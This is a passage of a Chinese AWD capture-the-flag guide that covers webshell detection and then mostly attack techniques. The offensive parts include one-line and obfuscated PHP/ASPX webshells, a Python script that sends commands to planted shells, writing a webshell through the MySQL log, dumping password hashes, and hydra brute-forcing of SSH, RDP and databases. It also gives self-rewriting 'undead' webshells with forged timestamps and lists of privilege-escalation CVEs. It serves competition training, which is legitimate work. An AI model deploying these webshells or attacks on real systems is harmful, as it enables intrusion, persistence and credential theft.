//查看最近5分钟修改文件(通配符加引号,避免被当前目录的shell展开) 404 | find ./ -name '*.php' | xargs wc -l | sort -n //按行数从小到大排序,寻找行数最短文件,一般有可能是一句话木马 405 | grep -r --include=*.php '[^a-z]eval($_POST' 
/var/www/html //查包含关键字的php文件 406 | find /var/www/html -type f -name "*.php" | xargs grep "eval(" |more //在Linux系统中使用find、grep和xargs命令的组合,用于在指定目录(/var/www/html)下查找所有以.php为扩展名的文件,并搜索这些文件中包含字符串"eval("的行,并使用more命令来分页显示结果以便在输出较长时进行逐页查看 407 | ``` 408 | 409 | #### 2.5.4 查杀不死马 410 | 411 | 也可以利用命令自动进行查找删除(注意这会连同正常的 php-fpm/apache 工作进程一起杀掉,所以之后必须重启服务;同时要删掉不断被重写的木马文件本身,否则循环进程被重新触发后又会生成) 412 | 413 | ```c 414 | ps -aux | grep www-data | grep -v grep | awk '{print $2}' | xargs kill -9 415 | ``` 416 | 417 | 然后重启服务 418 | 419 | ```c 420 | service php-fpm restart 421 | ``` 422 | 423 | #### 2.5.5 杀弹反弹shell 424 | 425 | 老规矩查看进程 426 | 427 | ```c 428 | ps -ef 429 | ps -aux 430 | ps -aux | grep www-data 431 | ``` 432 | 433 | 注意 `www-data` 权限的 `/bin/sh`,很有可能是nc 434 | 435 | 再就是上老一套命令 436 | 437 | ```c 438 | kill $(ps -aux | grep www-data | grep apache2 | grep -v grep | awk '{print $2}') //需要用 $( ) 把PID列表作为kill的参数 439 | ``` 440 | 441 | 442 | 443 | ## 3# 自由攻击环节(Attack) 444 | 445 | ### 3.0# 主要准备内容 446 | 447 | 1. 各类CMS软件包最新版准备 448 | 2. 扫描工具:Nmap、Nessus、Metasploit更新 449 | 3. 漏洞利用脚本Poc、Exp 450 | 451 | ### 3.1# 基本信息搜集 452 | 453 | #### 3.1.1 主机信息搜集 454 | 455 | Nmap 456 | 457 | ```c 458 | nmap -sn 192.168.0.0/24 //C段存活扫描 459 | ``` 460 | 461 | httpscan 462 | 463 | ```c 464 | httpscan.py 192.168.0.0/24 –t 10 //C段存活扫描 465 | ``` 466 | 467 | #### 3.1.2 端口扫描 468 | 469 | ```c 470 | nmap -sV 192.168.0.2 //扫描主机系统版本 471 | nmap -sS 192.168.0.2 //扫描主机常用端口 472 | nmap -sS -p 80,445 192.168.0.2 //扫描主机部分端口 473 | nmap -sS -p- 192.168.0.2 //扫描主机全部端口 474 | ``` 475 | 476 | Python脚本 477 | 478 | ```python 479 | import requests 480 | 481 | for x in range(2,255): 482 | url = "http://192.168.1.{}".format(x) 483 | try: 484 | r = requests.post(url) 485 | print(url) 486 | except: 487 | pass 488 | ``` 489 | 490 | ### 3.2# 外部打点 491 | 492 | #### 3.2.0 常见系统漏洞 493 | 494 | - MS17-010(永恒之蓝,可看[https://blog.zgsec.cn/archives/172.html](https://blog.zgsec.cn/archives/172.html)) 495 | - MySQL进行UDF提权(SQL注入或者MySQL弱口令) 496 | - MsSQL进行系统命令执行(SQL注入或者MsSQL弱口令) 497 | - SSH弱口令或默认口令 498 | - PWN(这个要看具体AWD比赛提供的内容了) 499 | 500 | #### 3.2.1 中间件漏洞 501 | 502 | - IIS(解析漏洞、远程代码执行) 
503 | - Apache(解析漏洞) 504 | - Nginx(解析漏洞) 505 | - Jboss(CVE-2017-7504/CVE-2017-12149/CVE-2015-7501) 506 | - Mysql(弱口令) 507 | - Tomcat(弱口令Getshell) 508 | - Weblogic(CVE-2020-2551/CVE-2020-2555/CVE-2020-2883) 509 | - SpringBoot(未授权访问漏洞和RCE漏洞,具体可看[https://blog.zgsec.cn/archives/129.html](https://blog.zgsec.cn/archives/129.html)) 510 | 511 | #### 3.2.2 集成服务环境漏洞 512 | 513 | - wampserver 514 | - xamppserver 515 | 516 | #### 3.2.3 CMS漏洞利用 517 | 518 | 搜集最新版本的CMS,以及对应的漏洞Poc和Exp,这里仅仅列举部分CMS: 519 | 520 | - Aspcms 521 | - Dedecms 522 | - Dicuz 523 | - Drupal 524 | - Empirecms 525 | - Eshop 526 | - Finecms 527 | - Joomla 528 | - Lamp 529 | - Metainfo 530 | - Phpcms 531 | - Phpwind 532 | - Qibocms 533 | - Seacms 534 | - Semcms 535 | - ThinkPHP 536 | - Wolfcms 537 | - Wordpress 538 | - Zabbix 539 | 540 | 备份文件爆破:使用7kbScan等目录扫描工具对Web系统进行爆破 541 | 542 | #### 3.2.4 上传WebShell 543 | 544 | 常见一句话木马 545 | 546 | ```php 547 | PHP: 549 | Aspx: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 550 | ``` 551 | 552 | Get型木马 553 | 554 | ```php 555 | /'^'{{{{';@${$_}[_](@${$_}[__]); //执行GET传参 ?_=system&__=whoami 来执行whoami命令 562 | /'^'{{{{';$___='$+4(/' ^ '{{{{{';@${$_}[_](@${$___}[__]); //执行GET传参 ?_=assert 和POST传参 __=PHP代码来GetShell 563 | ``` 564 | 565 | 隐藏的文件读取 566 | 567 | ```php 568 | curl "http://192.168.182.130:8801/include/shell.php" -d "admin_ccmd=system('cat /f*');" 580 | //向shell.php文件里传入参数并返回结果 581 | ``` 582 | 583 | Python多端口传参 584 | 585 | ```python 586 | #coding=utf-8 587 | import requests 588 | 589 | url_head="http://192.168.182.130" #网段 590 | url="" 591 | shell_addr="/upload/url/shell.php" #木马路径 592 | passwd="pass" #木马密码 593 | #port="80" 594 | payload = {passwd: 'System(\'cat /flag\');'} 595 | # find / -name "flag*" 596 | 597 | #清空上次记录 598 | flag=open("flag.txt","w") 599 | flag.close() 600 | flag=open("flag.txt","a") 601 | 602 | for i in range(8000,8004): 603 | url=url_head+":"+str(i)+shell_addr 604 | try: 605 | res=requests.post(url,payload)#,timeout=1 606 | if 
res.status_code == requests.codes.ok: 607 | result = res.text 608 | print (result) 609 | flag.write(result+"\n") 610 | else: 611 | print ("shell 404") 612 | except: 613 | print (url+" connect shell fail") 614 | 615 | flag.close() 616 | ``` 617 | 618 | #### 3.2.6 MySQL数据库利用 619 | 620 | 具体可以看这篇文章:[https://blog.zgsec.cn/archives/26.html](https://blog.zgsec.cn/archives/26.html) 621 | 622 | 1、查看MySQL版本 623 | 624 | ```sql 625 | show variables like '%version%'; 626 | select version(); #这个只显示MySQL版本号 627 | ``` 628 | 629 | 2、查看 `load_file()` 开启状态 630 | 631 | ```sql 632 | show variables like '%secure%'; #这条可查看详细信息 633 | show global variables like '%secure_file_priv%'; 634 | ``` 635 | 636 | 3、查看日志功能是否开启和对应目录 637 | 638 | ```sql 639 | SHOW VARIABLES LIKE 'general%'; 640 | set global general_log = "ON"; 641 | set global general_log_file='/var/www/html/test.php'; #可以写入WebShell然后直接连接蚁剑 642 | 643 | # 往日志里面写入 WebShell 644 | select ''; 645 | # 此时已经写到 test.php 文件当中了,注意这个要知道网站的具体路径才可以实现 646 | ``` 647 | 648 | 小技巧:获取MySQL账户和对应密码Hash 649 | 650 | ```sql 651 | # MySQL <= 5.6 版本 652 | select host, user, password from mysql.user; 653 | 654 | # MySQL >= 5.7 版本 655 | select host,user,authentication_string from mysql.user; 656 | ``` 657 | 658 | #### 3.2.7 弱口令爆破 659 | 660 | 爆破SSH密码 661 | 662 | ```c 663 | hydra -L 用户名字典.txt -P 密码字典.txt 目标IP地址 ssh 664 | hydra -L 用户名字典.txt -P 密码字典.txt ssh://192.168.1.100 665 | hydra -L 用户名字典.txt -P 密码字典.txt ssh://192.168.1.100 -s 40 //40是⽬标服务开放的端⼝ 666 | ``` 667 | 668 | 爆破FTP密码 669 | 670 | ```c 671 | hydra -L 用户名字典.txt -P 密码字典.txt 目标IP地址 ftp 672 | hydra -L 用户名字典.txt -P 密码字典.txt ftp://192.168.1.100/ 673 | ``` 674 | 675 | 爆破RDP远程桌面密码 676 | 677 | ```c 678 | hydra 目标IP地址 rdp -l administrator -P 密码字典.txt -V 679 | ``` 680 | 681 | 爆破Telnet 682 | 683 | ```c 684 | hydra 目标IP地址 telnet -l 用户字典.txt -P 密码字典.txt -f -V 685 | ``` 686 | 687 | 爆破MSSQL数据库 688 | 689 | ```c 690 | hydra -l sa -P 密码字典.txt 目标IP地址 mssql 691 | ``` 692 | 693 | 爆破MySQL数据库 694 | 695 | ```c 696 | hydra -L 
用户名字典.txt -P 密码字典.txt 目标IP地址 mysql 697 | ``` 698 | 699 | ### 3.3# 内网渗透 700 | 701 | #### 3.3.1 权限维持之不死马 702 | 703 | 简单不死马: 704 | 705 | ```php 706 | '); //创建shell.php 714 | sleep(0); //间隔时间 715 | } 716 | ``` 717 | 718 | 可以通过不断复写 `shell.php` 来达到该木马难以被使用的效果 719 | 720 | 防连接不死马: 721 | 722 | ```php 723 | '); //创建shell.php 730 | sleep(0); 731 | } 732 | 733 | //passwd=AabyssTeam 734 | //POST传参:passwd=AabyssTeam&cmd=system('ls'); 735 | ``` 736 | 737 | 进阶不死马: 738 | 739 | ```php 740 | '; 746 | 747 | while (1){ 748 | file_put_contents($file,$code); 749 | system('touch -m -d "2020-12-01 09:10:12" shell.php'); //修改时间,防止被删 750 | usleep(5000); 751 | } 752 | ?> 753 | 754 | //passwd=AabyssTeam 755 | //POST传参:passwd=AabyssTeam&cmd=system('ls'); 756 | ``` 757 | 758 | 将这个文件上传到服务器,然后进行访问,会在该路径下一直生成一个名字为 `shell.php` 的WebShell文件 759 | 760 | 双重不死马: 761 | 762 | ```php 763 | '; 770 | 771 | while (1){ 772 | file_put_contents($file,$code); 773 | system('touch -m -d "2020-12-01 18:10:12" .login.php'); 774 | file_put_contents($file1,$code); 775 | system('touch -m -d "2020-12-01 18:10:12" /admin/.register.php'); 776 | usleep(5000); 777 | } 778 | ?> 779 | 780 | //passwd=AabyssTeam 781 | //POST传参:passwd=AabyssTeam&cmd=system('ls'); 782 | ``` 783 | 784 | 浏览器访问写入的WebShell,会自动生成两个不死马: `.login.php` 和 `/admin/.register.php` 785 | 786 | #### 3.3.2 关键文件检索 787 | 788 | 组件检索 789 | 790 | ```c 791 | find / -name "apaech2.conf" //检索Apache主配置文件 792 | find / -name "nginx.conf" //检索Nginx目录 793 | find / -path "*nginx*" -name nginx*conf //检索Nginx配置目录 794 | find / -name "httpd.conf" //检索Apache目录 795 | find / -path "*apache*" -name apache*conf //检索Apache配置目录 796 | ``` 797 | 798 | 网站首页 799 | 800 | ```c 801 | find / -name "index.php" //定位网站目录 802 | find / -name "index.html" //定位网站目录 803 | ``` 804 | 805 | 日志文件检索 806 | 807 | ```c 808 | /var/log/nginx/ //默认Nginx日志目录 809 | /var/log/apache/ //默认Apache日志目录 810 | /var/log/apache2/ //默认Apache日志目录 811 | /usr/local/tomcat/logs //Tomcat日志目录 812 | tail -f xxx.log //实时刷新滚动日志文件 813 | 
``` 814 | 815 | #### 3.3.3 Linux提权 816 | 817 | 查询系统版本信息命令: 818 | 819 | ```c 820 | cat /etc/issue 821 | cat /etc/*-release 822 | cat /etc/lsb-release 823 | cat /etc/redhat-release 824 | ``` 825 | 826 | 查询内核版本信息命令: 827 | 828 | ```c 829 | uname -a 830 | uname -mrs 831 | cat /proc/version 832 | cat /etc/issue 833 | lsb_release -a 834 | hostnamectl 835 | rpm -q kernel 836 | dmesg | grep Linux 837 | ls /boot | grep vmlinuz 838 | ``` 839 | 840 | 查看系统环境变量命令: 841 | 842 | ```c 843 | cat /etc/profile 844 | cat /etc/bashrc 845 | cat ~/.bash_profile 846 | cat ~/.bashrc 847 | cat ~/.bash_logout 848 | env 849 | set 850 | ``` 851 | 852 | 查看语言环境信息命令(通配符要加引号,否则会先被 shell 展开): 853 | 854 | ```c 855 | find / -name "perl*" 856 | find / -name "python*" 857 | find / -name "gcc*" 858 | find / -name cc 859 | set 860 | ``` 861 | 862 | 查看文件上传环境信息命令: 863 | 864 | ```c 865 | find / -name wget 866 | find / -name "nc*" 867 | find / -name "netcat*" 868 | find / -name "tftp*" 869 | find / -name ftp 870 | ``` 871 | 872 | 这里列举一些可利用的提权漏洞(注意:内核类 Exp 一旦失败经常直接把目标打挂/内核 panic,在 AWD 里会丢掉可用性分,优先尝试 sudo、Polkit、SUID 这类用户态提权;先用 `uname -r` 核对版本再动手): 873 | 874 | - CVE-2023-0386(Linux OverlayFS权限提升漏洞,kernel 5.11 – 6.2,需要非特权 user namespace 可用) 875 | - CVE-2021-4034(PwnKit,Linux Polkit pkexec 本地权限提升漏洞,影响 2022 年 1 月补丁前的主流发行版) 876 | - CVE-2017-6074(DCCP双重释放漏洞,kernel 2.6.18 – 4.9.x,需要内核能加载 dccp 模块) 877 | - CVE-2016-5195(脏牛,kernel 2.6.22 – 4.8.3 (x86/x64),exploit-db 标题里的 "< 3.9" 只是该 PoC 的测试范围) 878 | - CVE-2016-8655(AF_PACKET 竞争条件,需要可用的 user namespace;Ubuntu 12.04、14.04,Debian 7、8) 879 | - CVE-2017-1000367(sudo本地提权漏洞,sudo 1.8.6p7 – 1.8.20,仅在启用 SELinux 的系统上可利用) 880 | - CVE-2016-1247(Debian/Ubuntu 打包的 Nginx logrotate 权限提升漏洞,需要先拿到 www-data 权限) 881 | - CVE-2017-16995(eBPF 校验器漏洞,kernel 4.4 – 4.14,Ubuntu 16.04 默认 4.4 内核受影响) 882 | 883 | Kali命令查询: 884 | 885 | ``` 886 | searchsploit CentOS 7 887 | searchsploit Ubuntu 16.04 888 | ``` 889 | 890 | 提权Exploit寻找: 891 | 892 | - [http://www.exploit-db.com](http://www.exploit-db.com) 893 | - [http://metasploit.com/modules/](http://metasploit.com/modules/) 894 | - [http://securityreason.com](http://securityreason.com) 895 | - [http://seclists.org/fulldisclosure/](http://seclists.org/fulldisclosure/) 896 | - [https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main](https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main) 897 | 898 | 编译提权Exp 899 | 900 | ``` 901 | gcc -o 
/usr/share/nginx/html/***** /usr/share/nginx/html/*****.c -Wall 902 | ``` 903 | 904 | 直接提权,确认权限(`id` 输出 uid=0,或者能直接读出 `/etc/shadow`,即说明已经是 root;另外注意放在 `/usr/share/nginx/html` 下的 Exp 源码和二进制会被 Nginx 直接对外提供下载、也容易被对手发现,建议编译到 `/tmp` 或 `/dev/shm` 并用完即删): 905 | 906 | ``` 907 | cat /etc/shadow 908 | ``` 909 | 910 | 其他提权姿势:[https://www.freebuf.com/articles/system/244627.html](https://www.freebuf.com/articles/system/244627.html) 911 | 912 | #### 3.3.4 Windows提权 913 | 914 | 这里列举一些Windows的漏洞: 915 | 916 | - 各种Potato(Github上面基本都有;前提是当前令牌持有 SeImpersonatePrivilege 或 SeAssignPrimaryTokenPrivilege,常见于 IIS、MSSQL 等服务账户,先用 `whoami /priv` 确认) 917 | - CVE-2023-35359(Windows内核权限提升漏洞,开源了) 918 | - CVE-2022-24521(没有Exp的可以找我要) 919 | - CVE-2019-1405 920 | - CVE-2019-1322 921 | - MS17-017(整型溢出漏洞) 922 | 923 | 924 | 925 | ## 4# 参考链接 926 | 927 | - [http://freebuf.com/](http://freebuf.com/) 928 | - [https://blog.zgsec.cn/](https://blog.zgsec.cn/) 929 | - [https://paper.seebug.org/3044/](https://paper.seebug.org/3044/) 930 | - [https://www.anquanke.com/](https://www.anquanke.com/) 931 | - [https://www.exploit-db.com/](https://www.exploit-db.com/) 932 | - [http://www.bugscan.net/source/template/vulns/](http://www.bugscan.net/source/template/vulns/) 933 | - [https://xz.aliyun.com/t/12687](https://xz.aliyun.com/t/12687) 934 | 935 | 936 | 937 | ## 5# 感谢各位师傅🙏 938 | 939 | ## Stargazers 940 | 941 | [![Stargazers repo roster for @AabyssZG/AWD-Guide](http://reporoster.com/stars/AabyssZG/AWD-Guide)](https://github.com/AabyssZG/AWD-Guide/stargazers) 942 | 943 | 944 | ## Forkers 945 | 946 | [![Forkers repo roster for @AabyssZG/AWD-Guide](http://reporoster.com/forks/AabyssZG/AWD-Guide)](https://github.com/AabyssZG/AWD-Guide/network/members) 947 | --------------------------------------------------------------------------------
